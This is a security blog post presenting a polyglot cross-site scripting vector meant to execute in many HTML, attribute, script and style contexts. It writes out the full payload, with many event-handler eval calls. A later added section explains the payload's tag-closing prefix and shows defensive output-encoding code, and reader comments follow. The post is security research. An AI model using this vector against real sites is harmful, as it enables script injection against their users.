One vector to rule them all

I set myself a fun challenge to create a vector that would execute in many contexts. The idea being that it should work regardless of where it’s placed. For example:

<tag alt="xss">

As an added challenge I tried to execute only the one payload and where possible to use a single eval. I had to use multiple evals as the contexts increased because for stuff like background= etc. there was no way I could figure reusing the existing one 🙁 So I had around 19, then got bored.

One vector to xss them all, one vector to find them,
One vector to bring them all and in the darkness bind them.

javascript:/*-->]]>%>?></script></title></textarea></noscript></style></xmp>">[img=1,name=/alert(1)/.source]<img -/style=a:expression&#40&#47&#42'/-/*&#39,/**/eval(name)/*%2A///*///&#41;;width:100%;height:100%;position:absolute;-ms-behavior:url(#default#time2) name=alert(1) onerror=eval(name) src=1 autofocus onfocus=eval(name) onclick=eval(name) onmouseover=eval(name) onbegin=eval(name) background=javascript:eval(name)//>"

Updated: added new vectors and removed any that weren’t required. Thanks to @LeverOne!!

2nd Update… Fixed comments, added name to [] rule so it executes without for dom rules. Thanks again for some fixes by @LeverOne
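The vector opens with a run of closers, one for each context it might land in: a javascript: scheme, comment and CDATA terminators, closing tags for script, title, textarea, noscript, style and xmp, then "> for a quoted attribute. The following is an added example, not code from the original post, showing the per-context output encoding that leaves each of those closers inert; the function names are hypothetical.

```javascript
// Added example; function names are hypothetical and not from any library.
// Opening "breakout" run of the vector in the post, copied verbatim.
const PREFIX = `javascript:/*-->]]>%>?></script></title></textarea></noscript></style></xmp>">`;

// HTML text and quoted-attribute contexts: entity-encode markup-significant characters.
// Not sufficient for unquoted attributes, style= or on*= handlers; keep untrusted data out of those.
function encodeHtml(s) {
  return s.replace(/[&<>"'`=\/]/g, (c) => `&#${c.charCodeAt(0)};`);
}

// JavaScript string-literal context: \uXXXX-escape everything except alphanumerics and
// space, so quotes, "</script>" and "-->" cannot end the string or the script block.
function encodeJsString(s) {
  return s.replace(/[^A-Za-z0-9 ]/g,
    (c) => "\\u" + c.charCodeAt(0).toString(16).padStart(4, "0"));
}

// URL contexts (href, src, background): allow-list the scheme before any encoding.
// Control characters and whitespace are dropped first because browsers ignore
// several of them while parsing a scheme. The cleaned value is what gets returned,
// so the string that was checked is the string that is emitted.
function safeUrl(s, fallback = "about:blank") {
  const cleaned = s.replace(/[\u0000-\u0020]+/g, "");
  const scheme = /^([a-z][a-z0-9+.-]*):/i.exec(cleaned);
  if (scheme && !["http", "https", "mailto"].includes(scheme[1].toLowerCase())) {
    return fallback;
  }
  return cleaned;
}

// One untrusted value placed into four contexts, each with its own encoder.
function render(value) {
  return {
    htmlText: `<p>${encodeHtml(value)}</p>`,
    attribute: `<img alt="${encodeHtml(value)}">`,
    jsString: `<script>var v = "${encodeJsString(value)}";</script>`,
    url: `<a href="${encodeHtml(safeUrl(value))}">link</a>`,
  };
}

console.log(render(PREFIX));
```

No single encoder covers every context, which is why the same value passes through a different function at each sink.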

4 Responses to “One vector to rule them all”

  1. Rodrigo writes:

    Lol, do you know what happens when you try to stumble this article? xD

  2. Gareth Heyes writes:


    Hmmm I can only guess 😀

  3. .mario writes:

    @Rodrigo LOL – very nice 😀

  4. anonymous writes:

    Just curious, but you seem to have thought of a number of different contexts (and not just the simple 3 you wrote down) – do you mind enumerating what all you have thought of?

    It seems ‘<noscript> xss </noscript>’ might be one, and there are more. It would help a noob a lot 🙂